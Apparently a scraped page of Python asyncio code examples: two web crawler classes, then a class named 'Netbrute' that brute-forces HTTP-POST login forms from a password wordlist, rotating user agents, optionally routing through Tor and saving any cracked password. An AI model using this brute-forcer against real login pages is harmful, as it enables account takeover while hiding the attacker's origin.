    @asyncio.coroutine
    def spider(self):
        """run  the spider until all finished"""
        workers = [
            asyncio.Task(self.work(), loop=self.loop)
            for _ in range(self.max_tasks)
        ]
        yield from self.q.join()

        for w in workers:
            w.cancel()
예제 #20
0
class Crawler:
    def __init__(self, root, max_tasks=1000, loop=None, file=None):
        LOGGER.info('Starting Crawler ...\n')
        self.loop = loop or asyncio.get_event_loop()
        self.q = Queue(loop=self.loop)
        self.visited_urls = set()
        self.max_tasks = max_tasks
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()

        parts = urllib.parse.urlparse(root)
        host, port = urllib.parse.splitport(parts.netloc)
        if re.match(r'\A[\d\.]*\Z', host):
            self.root_domains.add(host)
        else:
            host = host.lower()
            self.root_domains.add(host)

        print('Hosts : {}'.format(','.join(self.root_domains)))

        self.add_url(root)

        self.t0 = time.time()
        self.t1 = None
        filename = '{}.csv'.format(file)
        self.f = open(filename, 'w')
        self.csv = csv.writer(self.f)
        self.csv.writerow(CSV_HEADER)

    def add_url(self, url):
        LOGGER.debug('adding %r', url)
        self.visited_urls.add(url)
        self.q.put_nowait(url)

    def close(self):
        self.session.close()
        self.f.close()

    def host_okay(self, host):
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        return self._host_okay_strict(host)

    def _host_okay_strict(self, host):
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def url_allowed(self, url):
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    @asyncio.coroutine
    def parse_response(self, response):
        links = set()
        if response.status == 200:
            content_type = response.headers.get('content-type')

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()
                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''', text))
                if urls:
                    LOGGER.info('got %r distinct urls from %r', len(urls),
                                response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

                if links:
                    LOGGER.info('got %r distinct urls from %r', len(links),
                                response.url)
                for link in links.difference(self.visited_urls):
                    self.q.put_nowait(link)
                self.visited_urls.update(links)
        return links

    @asyncio.coroutine
    def fetch(self, url):
        try:
            response = yield from self.session.get(url, allow_redirects=False)
            self.csv.writerow([url, response.status])

            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                if next_url in self.visited_urls:
                    return
                else:
                    self.add_url(next_url)
            else:
                links = yield from self.parse_response(response)

                for link in links.difference(self.visited_urls):
                    self.q.put_nowait(link)
                self.visited_urls.update(links)
            yield from response.release()
        except aiohttp.ClientError as client_error:
            LOGGER.info('try for %r raised %r', url, client_error)

    @asyncio.coroutine
    def work(self):
        try:
            while True:
                url = yield from self.q.get()
                assert url in self.visited_urls
                yield from self.fetch(url)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    @asyncio.coroutine
    def crawl(self):
        workers = [
            asyncio.Task(self.work(), loop=self.loop)
            for _ in range(self.max_tasks)
        ]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()
예제 #21
0
class Crawler:
    """Crawl a set of URLs.

    This manages two sets of URLs: 'urls' and 'done'.  'urls' is a set of
    URLs seen, and 'done' is a list of FetchStatistics.
    这里面有两个队列.seen_urls 和 done
    """
    # TODO xpath support
    # TODO uvloop support
    def __init__(self, roots,
                 exclude=None, strict=True,  # What to crawl.
                 max_redirect=10, max_tries=4,  # Per-url limits.
                 max_tasks=10, *, loop=None):
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()
        for root in roots:
            parts = urllib.parse.urlparse(root)
            host, port = urllib.parse.splitport(parts.netloc)
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)
        self.t0 = time.time()
        self.t1 = None

    def close(self):
        """Close resources."""
        self.session.close()

    def host_okay(self, host):
        """Check if a host should be crawled.

        A literal match (after lowercasing) is always good.  For hosts
        that don't look like IP addresses, some approximate matches
        are okay depending on the strict flag.
        """
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        """Check if a host should be crawled, strict-ish version.

        This checks for equality modulo an initial 'www.' component.
        """
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        """Check if a host should be crawled, lenient version.

        This compares the last two components of the host.
        """
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        """Record the FetchStatistic for completed / failed URL."""
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):
        """Return a FetchStatistic and list of links."""
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()

                # Replace href with (?:href|src) to follow image links.
                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''',
                                      text))
                if urls:
                    LOGGER.info('got %r distinct urls from %r',
                                len(urls), response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stat = FetchStatistic(
            url=response.url,
            next_url=None,
            status=response.status,
            exception=None,
            size=len(body),
            content_type=content_type,
            encoding=encoding,
            num_urls=len(links),
            num_new_urls=len(links - self.seen_urls))

        return stat, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        """Fetch one URL."""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(
                    url, allow_redirects=False)

                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url, client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            LOGGER.error('%r failed after %r tries',
                         url, self.max_tries)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=None,
                                                 status=None,
                                                 exception=exception,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(FetchStatistic(url=url,
                                                     next_url=next_url,
                                                     status=response.status,
                                                     exception=None,
                                                     size=0,
                                                     content_type=None,
                                                     encoding=None,
                                                     num_urls=0,
                                                     num_new_urls=0))

                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    LOGGER.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    LOGGER.error('redirect limit reached for %r from %r',
                                 next_url, url)
            else:
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            yield from response.release()

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        try:
            while True:
                url, max_redirect = yield from self.q.get()
                assert url in self.seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        """Add a URL to the queue if not seen before."""
        if max_redirect is None:
            max_redirect = self.max_redirect
        LOGGER.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        """Run the crawler until all finished."""
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()
예제 #22
0
class Netbrute:
    """
    HTTP-POST BruteForcer
    """
    def __init__(self, loop, pre_url=None, pre_payload=None, target_url=None, login=None, payload_model=None, wordlist=None, error_string=None, tasks=64, tor=None, tor_address=None, debug=None):
        self.max_tasks = tasks
        self.queue = Queue()
        self.pre_url = pre_url
        self.pre_payload = self._generate_payload_type(pre_payload)
        self.attack_url = target_url
        self.login = login
        self.error_string = [x.strip() for x in error_string.split(',')]
        self.payload = self._generate_payload_type(payload_model)
        self.wordlist = wordlist
        self.found = Event()
        self.tor_use = tor
        #self.session = self._generate_new_session(loop)
        self.debug = debug
        self.runned_passwords = set()
        self.old_passwds = set()
        self.restore_files = []
        self.progress_bar = None
        self.ua = self._prepare_user_agents()
        self.start_time = time.time()
        self.last_report_time = time.time()

        # Statuses set of settings
        self.loaded_passwords = 0
        self.tried_passwords = 0
        self.error_passwords = 0
        self.max_passwords = 0

        # Tor set of settings
        if self.tor_use is not None and tor_address is not None:
            ip, port = parse_proxy_address(tor_address)
            self.tor_address = "http://{0}:{1}".format(ip, port)
            self.tor_address_string = tor_address

        # Session set of settings
        self.session_name = self._generate_session_name()
        restore_files = self._search_open_sesssion()
        if restore_files > 0:
            for file in self.restore_files:
                if self._load_old_session(file) is True:
                    break
        else:
            pass

    @staticmethod
    def _prepare_user_agents():
        #  Load user agents
        ua = get_user_agents()
        if not ua:
            raise Exception("No user agents available")
        return ua

    def _load_old_session(self, fn):
        """
        Function to ask user input and decide to use or not to use restore files.
        This also decompress (if it can) and reads data, storing it inside the main object.
        :param fn: String => Filename
        :return: Boolean
        """

        question = input("\n[*] Do you want to load passwords from file '{0}'? [y/N] ".format(os.path.basename(fn)))

        if question.upper() == "Y":
            try:
                #  Decompress the data and store it raw
                with gzip.open(fn, "rb", compresslevel=9) as f:
                    _data = f.read()
                with open(fn, "wb") as f:
                    f.write(_data)
            except:
                #  If decompression fails, probably it is not compressed.
                #  So we will open it and read, as it should.
                with open(fn, "rb") as f:
                    _data = f.read()

            #  Read data from file, decode it from BinaryBuffer to String.
            lines = [x.decode() for x in _data.split(b"\n")]

            #  Finally, add each line to old_passwords set.
            for line in lines:
                if line != "":
                    self.old_passwds.add(line)

            #  Define the session name as the restore file used.
            self.session_name = os.path.basename(fn)
            return True
        else:
            return False

    def _search_open_sesssion(self):
        current_dir = os.getcwd() + os.sep
        for root, dirc, files in os.walk(current_dir):
            for f in files:
                if f.endswith(".restore"):
                    file_path = os.path.join(root, f)
                    self.restore_files.append(file_path)
        return len(self.restore_files)

    @staticmethod
    def _generate_session_name():
        _id = hex(random.randint(0, 999999))
        return "session_{0}.restore".format(_id[2:])

    @staticmethod
    def _generate_payload_type(user_input):
        """
        Function responsible for transforming String type into Dictionary type
        :param user_input: str
        :return: d: dict
        """
        d = dict()
        p = [x.strip() for x in user_input.split(",")]
        for element in p:
            key, value = element.split(":")
            d[key] = value
        return d

    @staticmethod
    def _encode_payload_www(unencoded_payload):
        """
        Function responsible for transforming a dictionary payload into x-www-form-urlencoded payload
        :param unencoded_payload:
        :return:
        """
        pl = str()
        dict_len = len(unencoded_payload)
        i = 1
        for key in unencoded_payload:
            if i != dict_len:
                pl += "{0}={1}&".format(key, unencoded_payload[key])
            else:
                pl += "{0}={1}".format(key, unencoded_payload[key])
            i += 1
        return pl

    def _adjust_payload(self, payload, password=None, login=None):
        """
        Creates a copy from payload supplied by user, then formats it with attack data.
        :param password: String
        :return: tmp_payload: String
        """
        tmp_payload = copy(payload)
        for key in tmp_payload:
            value = tmp_payload[key]
            if value.upper() == "PASS":
                #  Modify the payload prototype with the queue's password.
                if password is not None:
                    tmp_payload[key] = password

            elif value.upper() == "LOGIN":
                #  Modify the payload prototype with the supplied login
                if login is not None:
                    tmp_payload[key] = login
            else:
                continue
        return tmp_payload

    @staticmethod
    def _store_data(fn, data):
        """
        Stores buffer of data into a file and adds a new line at the end of it.
        :param fn: String => Filename for a file
        :param data: String => Data buffer
        :return: None
        """
        data += "\n"
        with open(fn, "a") as f:
            f.write(data)
        return

    def _increment_progress_bar(self):
        """
        Check if one second has passed since last report, then renewal the progress bar with current attack progress
        :return: None
        """
        if (time.time() - self.last_report_time) < 1:
            return
        self.last_report_time = time.time()
        self.progress_bar.update((self.max_passwords - self.loaded_passwords) + self.tried_passwords)

    def _parse_response(self, status, response_url, passwd):
        """
        Parses the response packet based on http status code and response URL
        :param status: Integer => HTTP status code
        :param response_url: String => Request URL response
        :param passwd: String => Password that originated this response
        :return: None
        """
        for error_string in self.error_string:
            if type(response_url is yarl.URL):
                response_url = response_url.query_string
            if error_string in response_url:
                self.tried_passwords += 1
                self.runned_passwords.add(passwd)
                if len(self.runned_passwords) % 100 == 0:
                    [self._store_data(self.session_name, x) for x in self.runned_passwords]
                    self.runned_passwords.clear()
                return
        if status == 200:
            print("\n[+] Password was found: {0}".format(passwd))
            print("[*] Response URL: {0}".format(response_url))
            self._store_data("correct.pass", passwd)
            self._store_data("correct.pass", "{0}\n\n".format(self.payload))
            self.found.set()
        return


    async def pre_page_request(self, session):
        #  Use tor or not
        if self.tor_use is True:
            proxy_addr = self.tor_address
        else:
            proxy_addr = None

        #  We will always create new headers for you, dear sysadmin...
        headers = {
            "content-type": "application/x-www-form-urlencoded",
            "User-Agent": random.choice(self.ua),
        }

        #  Generate the payload
        custom_payload = self._adjust_payload(self.pre_payload, login=self.login)

        # Do the first request.
        async with session.post(self.pre_url, data=self._encode_payload_www(custom_payload), headers=headers, proxy=proxy_addr) as response:
            status, response_url = response.status, response.url
            if status == 200:
                return 0, headers
            else:
                return 1, headers


    async def attack_this(self, session, password, headers=None):
        """
        Perform IO operation for http request
        :param password: String => Password used in the attack
        :return: None
        """
        if self.debug:
            print("Started attack!")

        #  We need a header if not previously;
        if headers is None:
            headers = {
                "content-type": "application/x-www-form-urlencoded",
                "User-Agent": random.choice(self.ua),
            }

        custom_payload = self._adjust_payload(self.payload, password=password)

        # AsyncTimeout removed since commit c47781f
        #  with async_timeout.timeout(10):
        if self.tor_use is True:
            proxy_addr = self.tor_address
        else:
            proxy_addr = None
        async with session.post(self.attack_url, data=self._encode_payload_www(custom_payload), headers=headers, proxy=proxy_addr) as response:

            status, response_url = response.status, response.url

            self._parse_response(status, response_url, password)

            if self.debug is False:
                self._increment_progress_bar()

            if self.debug:
                print("Ended attack! [{0}] - Status: {1} - URL: {2}".format(password, status, response_url))
        return

    def _parse_wordlist(self, iterable):
        return list(filter(lambda x: x not in self.old_passwds, iterable))

    def _read_wordlist(self):
        tmp_list = []
        with open(self.wordlist, "r") as f:
            for line in f.readlines():
                tmp_list.append(line.replace("\n", ""))
        parsed_list = self._parse_wordlist(tmp_list)
        for element in parsed_list:
            self.queue.put_nowait(element)
        self.max_passwords = len(tmp_list)
        self.loaded_passwords = len(parsed_list)
        return len(parsed_list)


    def _generate_new_session(self, loop):
        #  Create cookie jar
        jar = aiohttp.CookieJar(unsafe=True)

        #  Adjust session object and tor usage information
        if self.tor_use is True:
            #print("[+] Using tor with address {0}\n".format(self.tor_address_string))
            conn = get_tor_connector(self.tor_address_string)
            session = aiohttp.ClientSession(loop=loop, cookie_jar=jar, connector=conn)
        else:
            session = aiohttp.ClientSession(loop=loop, cookie_jar=jar)
        return session

    @asyncio.coroutine
    def work(self, loop):
        while not self.queue.empty():
            #  Create new aiohttp session
            session = self._generate_new_session(loop)
            # Check if password is found and throw queue away
            if self.found.is_set():
                # noinspection PyProtectedMember
                for _ in range(len(self.queue._queue)):
                    yield from self.queue.get()

            #  Retrieve passwords from queue and test them
            password = yield from self.queue.get()

            # Do the request and deal with timeout
            try:
                k, headers = yield from self.pre_page_request(session)
                if k == 0:
                    yield from self.attack_this(session, password, headers=headers)
            except Exception as e:
                if self.debug:
                    print("Password '{0}' request timed out.".format(password))
                    print("Error: {0}\n".format(e))
                self.queue.put_nowait(password)
                pass
            session.close()
            self.queue.task_done()

    @asyncio.coroutine
    def initiate(self, loop):

        #  Attack preparation phase
        if self.debug:
            print("Started initiation!")
        pass_number = self._read_wordlist()
        print("\n[*] Program have read {0} passwords.\n".format(pass_number))

        #  Graphical visualization of attack status
        self.progress_bar = ProgressBar(widgets=
                                        ["Guesses: ", Counter(), "/", str(self.max_passwords),
                                         " [", Percentage(), "] ", Bar(marker="#"), " ", AdaptiveETA()],
                                        maxval=self.max_passwords).start()
        self.progress_bar.update(self.max_passwords - pass_number)

        #  Now the code to run the tasks and execute the async requests
        workers = [asyncio.Task(self.work(loop)) for _ in range(self.max_tasks)]
        yield from self.queue.join()
        for w in workers:
            w.cancel()
        if self.debug:
            print("Ended initiation!")